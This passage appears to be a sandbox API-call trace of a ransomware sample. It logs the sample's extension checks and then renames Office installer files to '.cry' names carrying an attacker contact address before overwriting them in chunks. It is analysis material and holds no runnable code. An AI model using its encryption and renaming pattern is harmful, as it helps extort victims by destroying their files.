(lpString=".dbf") returned 4 [0048.040] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.040] lstrlenW (lpString=".1cd") returned 4 [0048.040] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.040] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85 [0048.040] lstrlenW (lpString=".jpg") returned 4 [0048.040] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.040] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0048.040] lstrlenW (lpString="ProPlusrWW.msi") returned 14 [0048.040] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.041] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=27532288) returned 1 [0048.041] CloseHandle (hObject=0x190) returned 1 [0048.041] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020 [0048.041] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.041] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0048.041] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.041] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.041] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.041] ReadFile (in: hFile=0x190, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.127] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.127] ReadFile (in: hFile=0x190, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.242] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.242] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.242] ReadFile (in: hFile=0x190, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.315] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.315] WriteFile (in: hFile=0x190, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0048.492] SetEndOfFile (hFile=0x190) returned 1 [0048.496] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0048.499] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.500] WriteFile (in: hFile=0x190, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.501] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.501] WriteFile (in: hFile=0x190, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.505] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.505] WriteFile (in: hFile=0x190, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.507] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0048.507] CloseHandle (hObject=0x190) returned 1 [0048.507] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0048.507] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.507] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.507] lstrlenW (lpString=".doc") returned 4 [0048.507] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.507] lstrlenW (lpString=".docx") returned 5 [0048.507] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.507] lstrlenW (lpString=".pdf") returned 4 [0048.507] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.507] lstrlenW (lpString=".xls") returned 4 [0048.507] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.507] lstrlenW (lpString=".xlsx") returned 5 [0048.507] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.507] lstrlenW (lpString=".ppt") returned 4 [0048.507] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.507] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.507] lstrlenW (lpString=".zip") returned 4 [0048.507] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.507] lstrlenW (lpString=".rar") returned 4 [0048.507] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.507] lstrlenW (lpString=".bz2") returned 4 [0048.507] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.508] lstrlenW (lpString=".7z") returned 3 [0048.508] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString=".dbf") returned 4 [0048.508] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString=".1cd") returned 4 [0048.508] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString=".jpg") returned 4 [0048.508] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString=".doc") returned 4 [0048.508] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.508] lstrlenW (lpString=".docx") returned 5 [0048.508] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.508] lstrlenW (lpString=".pdf") returned 4 [0048.508] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.508] lstrlenW (lpString=".xls") returned 4 [0048.508] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.508] lstrlenW (lpString=".xlsx") returned 5 [0048.508] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.508] lstrlenW (lpString=".ppt") returned 4 [0048.508] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString=".zip") returned 4 [0048.508] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.508] lstrlenW (lpString=".rar") returned 4 [0048.508] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.508] lstrlenW (lpString=".bz2") returned 4 [0048.508] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.508] lstrlenW (lpString=".7z") returned 3 [0048.508] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.508] lstrlenW (lpString=".dbf") returned 4 [0048.509] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.509] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.509] lstrlenW (lpString=".1cd") returned 4 [0048.523] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.523] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0048.523] lstrlenW (lpString=".jpg") returned 4 [0048.523] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.524] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0048.524] lstrlenW (lpString="Office32WW.msi") returned 14 [0048.524] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0048.587] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1992192) returned 1 [0048.587] CloseHandle (hObject=0x22c) returned 1 [0048.587] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0048.587] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.587] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0048.588] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0048.588] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0048.588] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.588] ReadFile (in: hFile=0x22c, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.774] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.774] ReadFile (in: hFile=0x22c, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.796] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0048.796] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0048.796] ReadFile (in: hFile=0x22c, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.838] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.838] WriteFile (in: hFile=0x22c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0049.012] SetEndOfFile (hFile=0x22c) returned 1 [0049.012] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0049.023] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.023] WriteFile (in: hFile=0x22c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.025] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.025] WriteFile (in: hFile=0x22c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.026] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0049.026] WriteFile (in: hFile=0x22c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0049.028] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0049.028] CloseHandle (hObject=0x22c) returned 1 [0049.028] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString=".doc") returned 4 [0049.029] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0049.029] lstrlenW (lpString=".docx") returned 5 [0049.029] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0049.029] lstrlenW (lpString=".pdf") returned 4 [0049.029] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0049.029] lstrlenW (lpString=".xls") returned 4 [0049.029] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0049.029] lstrlenW (lpString=".xlsx") returned 5 [0049.029] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0049.029] lstrlenW (lpString=".ppt") returned 4 [0049.029] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString=".zip") returned 4 [0049.029] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0049.029] lstrlenW (lpString=".rar") returned 4 [0049.029] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0049.029] lstrlenW (lpString=".bz2") returned 4 [0049.029] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0049.029] lstrlenW (lpString=".7z") returned 3 [0049.029] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString=".dbf") returned 4 [0049.029] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString=".1cd") returned 4 [0049.029] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString=".jpg") returned 4 [0049.029] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.029] lstrlenW (lpString=".doc") returned 4 [0049.030] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0049.030] lstrlenW (lpString=".docx") returned 5 [0049.030] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0049.030] lstrlenW (lpString=".pdf") returned 4 [0049.030] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0049.030] lstrlenW (lpString=".xls") returned 4 [0049.030] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0049.030] lstrlenW (lpString=".xlsx") returned 5 [0049.030] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0049.030] lstrlenW (lpString=".ppt") returned 4 [0049.030] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.030] lstrlenW (lpString=".zip") returned 4 [0049.030] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0049.030] lstrlenW (lpString=".rar") returned 4 [0049.030] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0049.030] lstrlenW (lpString=".bz2") returned 4 [0049.030] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0049.030] lstrlenW (lpString=".7z") returned 3 [0049.030] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.030] lstrlenW (lpString=".dbf") returned 4 [0049.030] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.030] lstrlenW (lpString=".1cd") returned 4 [0049.030] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0049.030] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0049.030] lstrlenW (lpString=".jpg") returned 4 [0049.030] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0049.030] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cry") returned 1 [0049.030] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0049.030] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.738] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=715834) returned 1 [0049.738] CloseHandle (hObject=0x1bc) returned 1 [0049.738] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0049.738] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.738] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.738] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.738] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.738] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.738] GetLastError () returned 0x0 [0049.738] ReadFile (in: hFile=0x1bc, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0049.785] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0049.798] ReadFile (in: hFile=0x1bc, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.798] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x104, lpOverlapped=0x0) returned 1 [0049.799] SetEndOfFile (hFile=0x20c) returned 1 [0049.799] CloseHandle (hObject=0x20c) returned 1 [0049.799] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.799] SetEndOfFile (hFile=0x1bc) returned 1 [0049.804] CloseHandle (hObject=0x1bc) returned 1 [0049.804] SetFileAttributesW (lpFileName="C:\\MSOCache\\All 